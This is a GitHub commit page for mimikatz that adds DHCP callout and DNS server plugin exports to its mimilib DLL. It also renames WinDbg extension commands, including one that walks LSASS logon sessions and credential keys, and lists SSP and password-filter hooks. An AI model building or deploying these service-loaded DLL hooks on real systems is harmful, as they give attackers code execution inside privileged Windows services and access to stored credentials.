Skip to content
Permalink
Browse files
[new] mimilib now supports DHCP Callout, DNS Plugin, Coffee
  • Loading branch information
gentilkiwi committed May 8, 2017
1 parent 4c70f14 commit 22eaf29
Show file tree
Hide file tree
Showing 14 changed files with 2,458 additions and 19 deletions.

Large diffs are not rendered by default.

Large diffs are not rendered by default.

@@ -70,6 +70,10 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define MS_ENH_RSA_AES_PROV_XP L"Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
#endif

#ifndef SCARD_PROVIDER_CARD_MODULE
#define SCARD_PROVIDER_CARD_MODULE 0x80000001
#endif

#define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))

#define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))
@@ -12,7 +12,9 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global file
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF6-4DCA-9A60-6F4036929AEE}"
ProjectSection(SolutionItems) = preProject
inc\cardmod.h = inc\cardmod.h
inc\DbgHelp.h = inc\DbgHelp.h
inc\DhcpSSdk.h = inc\DhcpSSdk.h
inc\DsGetDC.h = inc\DsGetDC.h
inc\globals.h = inc\globals.h
inc\Midles.h = inc\Midles.h
@@ -0,0 +1,56 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdhcp.h"

HMODULE kdhcp_nextLibrary = NULL;
LPDHCP_NEWPKT kdhcp_nextLibraryCalloutNewPkt = NULL;

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
if((ul_reason_for_call == DLL_PROCESS_DETACH) && kdhcp_nextLibrary)
FreeLibrary(kdhcp_nextLibrary);
return TRUE;
}

DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl)
{
LPDHCP_ENTRY_POINT_FUNC nextEntry;
RtlZeroMemory(CalloutTbl, sizeof(DHCP_CALLOUT_TABLE));

if(ChainDlls)
if(kdhcp_nextLibrary = LoadLibrary(ChainDlls))
if(nextEntry = (LPDHCP_ENTRY_POINT_FUNC) GetProcAddress(kdhcp_nextLibrary, DHCP_CALLOUT_ENTRY_POINT))
nextEntry(ChainDlls + lstrlenW(ChainDlls) + 1, CalloutVersion, CalloutTbl);

if(CalloutTbl->DhcpNewPktHook)
kdhcp_nextLibraryCalloutNewPkt = CalloutTbl->DhcpNewPktHook;
CalloutTbl->DhcpNewPktHook = kdhcp_DhcpNewPktHook;

return ERROR_SUCCESS;
}

const BYTE macToBlack[][MAC_ADDRESS_SIZE] = {
{0x00, 0x0c, 0x29, 0x00, 0x00, 0x00},
{0x00, 0x50, 0x56, 0x00, 0x00, 0x00}
};
DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt)
{
DWORD status = ERROR_SUCCESS, m;
*ProcessIt = TRUE;

for(m = 0; m < ARRAYSIZE(macToBlack); m++)
{
if(RtlEqualMemory(*Packet + MAC_SOURCE_ADDRESS_OFFSET, macToBlack[m], MAC_ADDRESS_SIZE / 2)) // just the start of the address
{
*ProcessIt = FALSE;
status = DHCP_DROP_INVALID;
break;
}
}
if(kdhcp_nextLibraryCalloutNewPkt && *ProcessIt)
status = kdhcp_nextLibraryCalloutNewPkt(Packet, PacketSize, IpAddress, Reserved, PktContext, ProcessIt);
return status;
}
@@ -0,0 +1,14 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "utils.h"
#include <dhcpssdk.h>

#define MAC_ADDRESS_SIZE 6
#define MAC_SOURCE_ADDRESS_OFFSET 28

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl);
DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt);
@@ -0,0 +1,30 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
{
klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
fclose(kdns_logfile);
}
return ERROR_SUCCESS;
}
@@ -0,0 +1,19 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "utils.h"

#define PLUGIN_ALLOCATOR_FUNCTION PVOID
#define PLUGIN_FREE_FUNCTION PVOID
#define PDB_RECORD PVOID

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction);
DWORD WINAPI kdns_DnsPluginCleanup();
DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead);
// DnsPluginQuery2
// DnsPluginQueryZoneScope
// DnsPluginQueryServerScope
// DnsPluginQueryCacheScope
@@ -1,11 +1,20 @@
LIBRARY
EXPORTS
startW = kappfree_startW

SpLsaModeInitialize = kssp_SpLsaModeInitialize

InitializeChangeNotify = kfilt_InitializeChangeNotify
PasswordChangeNotify = kfilt_PasswordChangeNotify

WinDbgExtensionDllInit = WinDbgExtensionDllInit
ExtensionApiVersion = ExtensionApiVersion

mimikatz = mimikatz
WinDbgExtensionDllInit = kdbg_WinDbgExtensionDllInit
ExtensionApiVersion = kdbg_ExtensionApiVersion
coffee = kdbg_coffee
mimikatz = kdbg_mimikatz

DnsPluginInitialize = kdns_DnsPluginInitialize
DnsPluginCleanup = kdns_DnsPluginCleanup
DnsPluginQuery = kdns_DnsPluginQuery

DhcpServerCalloutEntry = kdhcp_DhcpServerCalloutEntry
DhcpNewPktHook = kdhcp_DhcpNewPktHook
@@ -88,6 +88,8 @@
</ItemGroup>
<ItemGroup>
<ClCompile Include="kappfree.c" />
<ClCompile Include="kdhcp.c" />
<ClCompile Include="kdns.c" />
<ClCompile Include="kfilt.c" />
<ClCompile Include="kssp.c" />
<ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.c" />
@@ -99,6 +101,8 @@
<ClCompile Include="utils.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="kdhcp.h" />
<ClInclude Include="kdns.h" />
<ClInclude Include="kfilt.h" />
<ClInclude Include="kssp.h" />
<ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.h" />
@@ -29,6 +29,8 @@
<ClCompile Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.c">
<Filter>sekurlsadbg</Filter>
</ClCompile>
<ClCompile Include="kdns.c" />
<ClCompile Include="kdhcp.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="utils.h" />
@@ -52,6 +54,8 @@
<ClInclude Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.h">
<Filter>sekurlsadbg</Filter>
</ClInclude>
<ClInclude Include="kdns.h" />
<ClInclude Include="kdhcp.h" />
</ItemGroup>
<ItemGroup>
<Filter Include="sekurlsadbg">
@@ -15,17 +15,12 @@ EXT_API_VERSION g_ExtApiVersion = {5 , 5 ,
, 0};
USHORT NtBuildNumber = 0;

LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void)
LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void)
{
return &g_ExtApiVersion;
}

VOID CheckVersion(void)
{
return;
}

VOID WDBGAPI WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
VOID WDBGAPI kdbg_WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
{
ExtensionApis = *lpExtensionApis;
NtBuildNumber = usMinorVersion;
@@ -80,7 +75,12 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonTime), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonServer)},
};

DECLARE_API(mimikatz)
DECLARE_API(kdbg_coffee)
{
dprintf("\n ( (\n ) )\n .______.\n | |]\n \\ /\n `----'\n");
}

DECLARE_API(kdbg_mimikatz)
{
ULONG_PTR pInitializationVector = 0, phAesKey = 0, ph3DesKey = 0, pLogonSessionList = 0, pLogonSessionListCount = 0, pSecData = 0, pDomainList = 0;
PLIST_ENTRY LogonSessionList;
@@ -59,10 +59,10 @@ typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
ULONG offsetToLogonServer;
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;

LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void);
VOID CheckVersion(void);
VOID WDBGAPI WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
DECLARE_API(mimikatz);
LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void);
VOID WDBGAPI kdbg_WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
DECLARE_API(kdbg_coffee);
DECLARE_API(kdbg_mimikatz);

VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
VOID kuhl_m_sekurlsa_genericKeyOutput(struct _KIWI_CREDENTIAL_KEY * key);
@@ -131,6 +131,8 @@ BOOL kull_m_crypto_close_hprov_delete_container(HCRYPTPROV hProv)
}
}
}
if(!status)
PRINT_ERROR_AUTO(L"CryptGetProvParam/CryptAcquireContextA");
return status;
}

@@ -554,9 +556,10 @@ BOOL kull_m_crypto_DerAndKeyToPfx(LPCVOID der, DWORD derLen, LPCVOID key, DWORD
CryptDestroyKey(hCryptKey);
}
else PRINT_ERROR_AUTO(L"CryptImportKey");
CryptReleaseContext(hCryptProv, 0);
if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
kull_m_crypto_close_hprov_delete_container(hCryptProv);
//CryptReleaseContext(hCryptProv, 0);
//if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
// PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
}
else PRINT_ERROR_AUTO(L"CryptAcquireContext");
LocalFree(infos.pwszContainerName);

0 comments on commit 22eaf29

Please sign in to comment.